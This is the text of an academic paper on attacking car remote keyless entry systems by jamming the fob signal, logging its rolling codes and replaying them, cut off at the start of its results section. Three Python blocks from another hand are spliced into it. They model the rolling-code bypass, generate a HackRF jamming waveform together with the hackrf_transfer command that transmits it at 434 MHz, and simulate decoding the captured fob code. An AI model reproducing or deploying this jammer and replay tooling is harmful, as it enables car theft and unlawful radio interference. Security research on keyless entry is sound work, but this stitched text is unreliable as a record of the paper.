Key Is In The Air: Hacking Remote Keyless Entry Systems

Omar Adel Ibrahim (1), Ahmed Mohamed Hussain (2), Gabriele Oligeri (1), and Roberto Di Pietro (1)

(1) College of Science and Engineering, Hamad Bin Khalifa University, Doha, Qatar
(2) Electrical Engineering Department, Qatar University, Doha, Qatar
Abstract. A Remote Keyless System (RKS) is an electronic lock that controls access to a building or a vehicle without using a traditional mechanical key. Although RKS have become more and more robust over time, in this paper we show that specifically designed attack strategies are still effective against them. In particular, we show how RKS can be exploited to efficiently hijack cars' locks. Our new attack strategy, inspired by a previously introduced strategy named jam-listen-replay, only requires a jammer and a signal logger. We prove the effectiveness of our attack against six different car models. The attack is successful in all of the tested cases, and for a wide range of system parameters. We further compare our solution against state-of-the-art attacks, showing that the discovered vulnerabilities improve on past attacks, and conclude that RKS solutions cannot be considered secure, hence calling for further research on the topic.
1 Introduction
Remote Keyless Systems (RKS) are a critical component of modern car security. Such systems allow the user to lock/unlock the car without resorting to any mechanical key, but only by clicking a button on the car's fob or even by getting close to the car itself. RKS mainly implement a request-response protocol between the fob and the car's radio transceiver with minimal security protection [3]. Over the years, several security flaws have been identified and RKS have evolved to mitigate such attacks. An interesting example is the so-called rolling codes, which prevent an eavesdropper from reusing a code sequence from the past: at each transmission a new code is generated, invalidating the old one, by resorting to hash function computations. Unfortunately, rolling codes protect against neither proxy attacks nor jam-listen-replay attacks [11]. The first class of attacks involves proxying the code sequence to the car from a greater distance without the user's consent. This is a classical attack that proceeds as follows: a user who leaves the fob unattended allows an adversary to activate the fob (without stealing it, just by pressing the button) and to proxy the code sequence emitted by the fob to the car over another radio technology such as WiFi, Bluetooth or GSM. Proxy attacks can be mitigated using distance bounding and proximity solutions [12]. Nevertheless, jam-listen-replay attacks are still an open issue due to the difficulty of mitigating jamming attacks. Indeed, the adversary prevents the reception of the code sequence by jamming the car's radio transceiver and, at the same time, logs it for the future hijacking of the car.
Contribution. This paper pushes further the analysis of the jam-listen-replay attack proposed in [11]. We propose an improved attack scenario that exploits cheap hardware and commonly available Linux tools. We show the results of a real measurement campaign highlighting the effectiveness of the proposed attack and comparing it against the one introduced in [11]. We observe how, given the current state of the art, these types of attacks cannot be solved without resorting to novel authentication mechanisms, hence justifying further research efforts by both industry and academia on this topic.
Roadmap. The next section reviews the state of the art of RKS security. Section 3 details the attack scenario; Section 4 introduces the adopted equipment and its configuration, while Section 5 reports on our measurement campaign and discusses the differences between our attack and the state of the art. Finally, some concluding remarks are presented in Section 6.
2 Related work
A major family of attacks exploits jamming in two subsequent phases: preventing the delivery of the message to the car (by jamming) and recording the transmitted message for subsequent re-transmission. An early contribution was provided by [11]. The authors first propose an efficient brute-force technique for hacking garage door remote controllers. Secondly, they introduce RollJam, a combined jamming and radio-recording technique enabling the adversary to hack the communications between the car and its associated fob. RollJam involves very cheap devices such as a Teensy 3.1 and two CC1101 transceivers. RollJam works by preventing one or more messages from being delivered from the fob to the car while recording them. Eventually, RollJam allows the user to get in the car, but a sequence of valid messages has been stolen and can be reused later on for opening the car.

The authors of [5], and subsequently of [4], revised the jamming-based attack by considering pulsed electromagnetic interference instead of continuous interference. They analyzed the effects of pulsed interference on envelope detectors through both simulations and measurements. They also suggested an improved receiver design based on synchronous transmitter-receiver communications, which turns out to be more robust against pulsed interference.

The authors of [10] demonstrated the relay attack on Passive Keyless Entry Systems (PKES) used in modern cars. They set up two low-cost and powerful attack scenarios, using wireless and wired physical-layer relays, enabling the adversary to open the car and start the engine by relaying the messages between the key and the car.

A general overview of several potential attack techniques against passive entry systems is given in [3]. The authors propose a solution to protect the vehicle from such attacks by exploiting the difference in power levels of the received bits.
3 Scenario
Our attack scenario involves three entities: the car, the car's owner (user) and the adversary who wants to steal the user's car. The adversary implements his strategy in three successive steps, as depicted in Fig. 1: (i) set-up, (ii) jamming and recording, and (iii) hijacking.
Fig. 1. The attack is performed in a sequence of three steps: (a) jammer set-up and activation, (b) jamming the communication between the user and the car, forcing the user to use the mechanical key, and finally (c) when the user leaves the car unattended, the adversary hijacks the car.
Set-up. This is a preliminary phase that is performed by the adversary when the car is left unattended by the user. Indeed, the adversary has to install a jammer on the car. As will become clear in the following, the jammer is a very portable device consisting mainly of a Raspberry Pi v3 (RPiv3) connected to a HackRF One, a very cheap and ready-to-deploy Software Defined Radio (SDR). The overall equipment can be hidden in several places on the outside of the car, e.g., by using a magnet underneath the car.

Jamming and recording. The equipment is activated after its installation, and it prevents the communication between the fob and the car by jamming a specific frequency. Since the user will not be able to open the car by using the fob, after several attempts he will resort to the mechanical key. Meanwhile, the adversary records one or more code sequences transmitted by the fob (and never received by the car) by eavesdropping on the fob-car communication channel.

Hijacking. The car's owner will eventually drive the car away and lock it, still using the mechanical key. We recall that a jammer is installed on the car, preventing the fob from controlling the lock mechanism of the car. Subsequently, the adversary performs his attack by replaying one of the previously recorded code sequences, which allows him to hijack the car.

The only parameter of the previous procedure unknown to the adversary is the communication frequency adopted by the car brand. The adversary can easily determine it by running a discovery session that senses portions of the radio spectrum. Our experiments show that the majority of the cars we used adopt a frequency band close to 433 MHz.
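The following Python model is added here as an illustration; it is not code from the paper or its authors. It ties the rolling-code description of Section 1 to the three-step scenario above: a fob emits a fresh code at every press, the car invalidates older codes, yet every code that was jammed and logged stays valid because the car never consumed it. The construction is an assumption of this example (a 32-bit press counter authenticated with a truncated HMAC-SHA256 under a key shared by fob and car, accepted only if strictly newer than the last accepted counter and within a resynchronisation window of 16); real vendor schemes differ in cipher and window size. The class names and the shared key are constructed.

```python
import hashlib
import hmac
from typing import Dict, List, Tuple

Message = Tuple[int, bytes]          # (press counter, authentication tag)


def _tag(key: bytes, counter: int) -> bytes:
    """Code derived from the counter: truncated HMAC-SHA256, standing in for the
    vendor-specific hash/cipher a real fob uses (assumed construction)."""
    return hmac.new(key, counter.to_bytes(4, "big"), hashlib.sha256).digest()[:8]


class Fob:
    """Rolling-code transmitter: every button press emits a fresh counter and its tag."""
    def __init__(self, key: bytes) -> None:
        self.key = key
        self.counter = 0

    def press(self) -> Message:
        self.counter += 1
        return (self.counter, _tag(self.key, self.counter))


class Car:
    """Receiver: remembers the last accepted counter and only accepts an authentic
    code that is strictly newer and at most `window` presses ahead (resync window)."""
    def __init__(self, key: bytes, window: int = 16) -> None:
        self.key = key
        self.window = window
        self.last_counter = 0

    def receive(self, msg: Message) -> bool:
        counter, tag = msg
        if not hmac.compare_digest(tag, _tag(self.key, counter)):
            return False                                   # forged or corrupted code
        if not (self.last_counter < counter <= self.last_counter + self.window):
            return False                                   # already used, or too far ahead
        self.last_counter = counter                        # all older codes are now invalid
        return True


class Channel:
    """Fob-to-car radio link. While `jammed`, the car decodes nothing, but the
    adversary's logger (placed nearer the fob than the jammer) still captures the code."""
    def __init__(self, car: Car) -> None:
        self.car = car
        self.jammed = False
        self.logged: List[Message] = []

    def transmit(self, msg: Message) -> bool:
        if self.jammed:
            self.logged.append(msg)                        # step (ii): jam and record
            return False                                   # the car never sees this code
        return self.car.receive(msg)


def run_attack() -> Dict[str, object]:
    key = bytes.fromhex("00112233445566778899aabbccddeeff")   # constructed shared secret
    fob, car = Fob(key), Car(key)
    link = Channel(car)

    first = fob.press()
    legit = link.transmit(first)                # normal use before the jammer is installed

    link.jammed = True                          # steps (i)/(ii): jammer mounted on the car and switched on
    for _ in range(3):                          # user retries, gives up, uses the mechanical key
        link.transmit(fob.press())
    link.jammed = False                         # step (iii): car unattended, adversary stops jamming

    stale = car.receive(first)                  # plain replay of a code the car already consumed
    captured = car.receive(link.logged[0])      # replay of the first code the car never received
    remaining = sum(car.receive(m) for m in link.logged[1:])   # the rest stay valid, in order

    return {"legit_press_accepted": legit,           # True: rolling code works normally
            "stale_replay_accepted": stale,          # False: rolling code defeats naive replay
            "captured_replay_accepted": captured,    # True: jam-listen-replay defeats rolling code
            "further_codes_usable": remaining}       # 2: every jammed press is a spare key


if __name__ == "__main__":
    print(run_attack())
```

The model makes the asymmetry explicit: the counter check is what stops a sniffed-and-replayed old code, but it cannot distinguish a code the legitimate fob sent that was jammed from one the adversary is sending now. Each jammed press yields one more usable code, which is why the paper's variant (jam until the user falls back to the mechanical key) collects several at once.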
4 Equipment: Hardware, Software and Set-up Configuration

Our system consists of two components: the Jammer and the code sequence Logger.
4.1 Jammer
We implemented a mobile jammer by connecting a Raspberry Pi v3 to a HackRF One and a power bank, as depicted in Fig. 2.

HackRF One: HackRF One is an open source, half-duplex Software Defined Radio device developed by Great Scott Gadgets, with the capability to receive or transmit radio signals from 1 MHz to 6 GHz.

ANT500 Antenna: ANT500 is a general-purpose telescopic antenna developed by Great Scott Gadgets, designed to operate in the range from 75 MHz up to 1 GHz. Its length is adjustable from 20 cm up to 88 cm.

Raspberry Pi v3: We installed GNU Radio on the RPiv3 and used its Python API to control the HackRF One. The result is a script that transmits white Gaussian noise on a target frequency.

Power bank: We adopted a generic 5000 mAh power bank, guaranteeing a long-lasting life to our system (about half a day).
Fig. 2. The Jammer: an RPiv3 controls the HackRF One, transmitting white Gaussian noise at the frequency of 434 MHz. The power bank guarantees half a day of jamming activity.
Finally, we exploited the embedded WiFi of the RPiv3 to access it through SSH, changing the various jamming parameters and switching it on and off. We observe that the jamming frequency (433 MHz) is far from the one used by WiFi (2.4 GHz), and therefore the jammer can be remotely controlled while it is active. We set all the gains of the HackRF One to 40 dB, i.e., the radio-frequency (RF), intermediate-frequency (IF) and baseband (BB) gains. Finally, we set the sampling rate to 2 Msps as an empirical trade-off: since the sampling rate sets the bandwidth of the transmitted noise, this is enough to jam the fob-car communication without disturbing other communications in the neighborhood.
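As an added example (not the authors' GNU Radio script, which the paper does not reproduce), the following Python generates white Gaussian noise in the 8-bit signed interleaved I/Q format that hackrf_transfer reads, so the same jamming waveform can be replayed from the command line instead of a GNU Radio flowgraph. The function names, the noise standard deviation of 0.3 full scale and the clip-instead-of-wrap policy are assumptions of this example.

```python
import random
import struct


def gaussian_noise_iq(num_samples: int, sigma: float = 0.3, seed: int = 1) -> bytes:
    """Complex white Gaussian noise as interleaved signed 8-bit I/Q samples, the raw
    format hackrf_transfer transmits with -t.  sigma is the noise standard deviation
    relative to full scale (1.0 == 127).  Components beyond full scale are clipped
    rather than wrapped, because two's-complement wrap-around creates strong spurs."""
    rng = random.Random(seed)               # fixed seed: reproducible file for the example
    out = bytearray()
    for _ in range(num_samples):
        for component in (rng.gauss(0.0, sigma), rng.gauss(0.0, sigma)):
            clipped = max(-1.0, min(1.0, component))
            out.append(int(round(clipped * 127)) & 0xFF)   # int8 as a two's-complement byte
    return bytes(out)


def decode_iq(blob: bytes):
    """Inverse of the packing above: list of (i, q) integer pairs in [-127, 127]."""
    values = struct.unpack(f"{len(blob)}b", blob)
    return list(zip(values[0::2], values[1::2]))


def clip_fraction(blob: bytes) -> float:
    """Share of components sitting at full scale.  Tune sigma so this stays small:
    heavy clipping flattens the Gaussian shape and splatters energy out of band."""
    values = struct.unpack(f"{len(blob)}b", blob)
    return sum(1 for v in values if abs(v) == 127) / len(values)


def write_noise_file(path: str, seconds: float, sample_rate: int = 2_000_000,
                     sigma: float = 0.3) -> int:
    """Write `seconds` of noise at `sample_rate` (2 Msps as in the paper, which also
    fixes the occupied bandwidth around the centre frequency); returns bytes written."""
    blob = gaussian_noise_iq(int(seconds * sample_rate), sigma)
    with open(path, "wb") as fh:
        fh.write(blob)
    return len(blob)


if __name__ == "__main__":
    # One second at 2 Msps is 4 MB on disk; hackrf_transfer -R loops the file.
    print(write_noise_file("noise_434MHz.iq", seconds=1.0), "bytes written")
```

The file is transmitted with `hackrf_transfer -t noise_434MHz.iq -f 434000000 -s 2000000 -x 40 -a 1 -R` (-x is the TX VGA gain in dB, -a enables the RF amplifier, -R repeats the file). Radiating on 434 MHz requires authorisation in most jurisdictions, so bench tests belong on a dummy load or inside a shielded enclosure.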
4.2 Logger
The logger consists mainly of a mobile platform able to log the code sequence transmitted by the fob to the car. We adopted the following set-up:

Laptop: We configured a laptop with a Linux Ubuntu distribution and GNU Radio Companion.

HackRF One and ANT500 Antenna: A HackRF One has been connected to the above laptop to record all the code signals transmitted in the neighborhood. Figure 3 summarizes our logger set-up and the main connections.

Fig. 3. The Logger: a laptop equipped with Ubuntu and GNU Radio Companion is used to receive and log the code sequence transmitted by the fob.

We considered the following configuration for the SDR: frequency 434 MHz, sampling rate 2 Msps, RF gain 10 dB, IF gain 20 dB, and BB gain 20 dB. We observe that the gain figures adopted by the logger differ significantly from those used by the jammer. Indeed, the logger has to mitigate the noise power coming from the jammer in order to decode the code sequence transmitted by the fob, and lower receive gains keep the jammer's energy from saturating the receiver front end. The above values are the result of several trials, and they also take into account the relative distances between the jammer, the fob and the logger.
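To make the role of the relative distances concrete, the following Python simulation (added here, not from the paper) models why the logger can decode what the car cannot: the jammer is mounted on the car, so at the car's receiver the Gaussian jamming noise swamps the fob burst, while the logger near the user sees the fob signal far above the noise. It assumes an OOK-modulated fob burst demodulated by a per-bit envelope detector (the receiver type analysed in [5] and [4]); the path gains, noise levels, 32-sample bit period and 24-bit code are constructed for the example, and actual fob modulation and distances vary by model.

```python
import random

SAMPLES_PER_BIT = 32   # assumed oversampling of the baseband envelope


def ook_burst(bits, samples_per_bit=SAMPLES_PER_BIT):
    """Baseband envelope of an OOK burst: carrier on (1.0) for a 1, off (0.0) for a 0."""
    return [1.0 if b else 0.0 for b in bits for _ in range(samples_per_bit)]


def receive(burst, fob_gain, jammer_sigma, rng):
    """Samples at one receiver: the fob burst scaled by its path gain plus the jammer's
    white Gaussian noise with standard deviation jammer_sigma (constructed values)."""
    return [fob_gain * s + rng.gauss(0.0, jammer_sigma) for s in burst]


def envelope_decode(samples, samples_per_bit=SAMPLES_PER_BIT):
    """Non-coherent envelope detector: average |x| over each bit period, then slice
    at the midpoint between the weakest and strongest bit, as a simple AGC would."""
    energies = []
    for start in range(0, len(samples), samples_per_bit):
        chunk = samples[start:start + samples_per_bit]
        energies.append(sum(abs(x) for x in chunk) / len(chunk))
    threshold = (max(energies) + min(energies)) / 2.0
    return [1 if e > threshold else 0 for e in energies]


def bit_errors(sent, decoded):
    return sum(1 for a, b in zip(sent, decoded) if a != b)


def simulate(seed=7):
    rng = random.Random(seed)
    code = [int(c) for c in "101101001110010110100011"]     # constructed 24-bit code
    burst = ook_burst(code)
    # Car receiver: the jammer sits on the car, so its noise dominates the fob signal.
    car_rx = receive(burst, fob_gain=1.0, jammer_sigma=8.0, rng=rng)
    # Logger: held near the user, metres from the jammer, so the fob signal dominates.
    logger_rx = receive(burst, fob_gain=1.0, jammer_sigma=0.05, rng=rng)
    logged = envelope_decode(logger_rx)
    return {
        "car_bit_errors": bit_errors(code, envelope_decode(car_rx)),       # many
        "logger_bit_errors": bit_errors(code, logged),                     # 0
        "logged_code": "".join(str(b) for b in logged),                    # ready to replay
    }


if __name__ == "__main__":
    print(simulate())
```

The same logic explains the gain settings in this section: what matters is the signal-to-jammer ratio at each receiver, which the adversary controls through placement (jammer on the car, logger near the fob) and then fine-tunes with the RF, IF and BB gains.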
5 Measurement results

We performed several measurements in the parking lot of our university (College of Science and Engineering, Hamad Bin Khalifa University, Doha, Qatar) during